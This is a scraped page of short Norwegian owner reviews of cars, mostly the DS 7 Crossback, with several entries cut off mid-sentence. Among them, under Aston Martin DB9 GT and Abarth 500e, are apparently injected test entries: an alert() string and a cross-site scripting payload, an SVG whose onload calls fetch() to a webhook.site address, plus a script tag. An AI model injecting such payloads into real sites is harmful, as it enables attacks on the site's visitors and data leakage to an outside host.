DS DS 7 Crossback (2021)
Bilen er flott å se på innvendig som utvendig, romslig og veldig behagelig å kjøre. Den kommer seg frem også på vinteren, er relativt spekket med utstyr sett opp mot tilsvarende prismodeller, og
DS DS 7 Crossback (2020)
Nydelig bil med en del særegenheter.
DS DS 7 Crossback (2020)
3år og ca 45.000km. Lett å bli glad i. En bil ikke alle andre har. Dekkslitasje er et uadressert problem som vil koste dyrt over tid. Ellers bra.
DS DS 7 Crossback (2020)
Komfortabel, svært stille, behagelig å kjøre. God motorkraft med 2 elmotorer + bensin. Appen trenger overhaling. Bilen anbefales.
DS DS 7 Crossback (2020)
Stille, komfortabel og lett å leve med. Appen for varmestyring og annet skriker etter en oppdatering. Ellers superfornøyd.
DS DS 7 Crossback (2020)
Fantastisk komfort skal du lete lenge etter til den prisen?
DS DS 7 Crossback (2020)
Bedre bil å kjøre får du ikke til den prisen.
DS DS 7 Crossback (2020)
Cruisekontrollen er alt for følsom for regnvær... Ellers svarer bilen helt til høye forventninger
DS DS 7 Crossback (2020)
Har hatt bilen i 6 måneder nå, og er totalt sett meget fornøy - vil trygt anbefale denne til andre! Perfekt for norske veier og forhold.
DS DS 7 Crossback (2019)
Svært fornøyd med bilen. Stilig innvendig og utvendig, med en fantastisk kjørekomfort. Sliter litt med å venne meg til å være eier av bensinmotor, men du for en flott dynamikk i motoren.
DS DS 7 Crossback (2018)
Komfortabel bil med god plass. God å trekke campingvogn med. Behagelige kjøreegenskaper.
Renault 5 E-Tech (2025)
Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km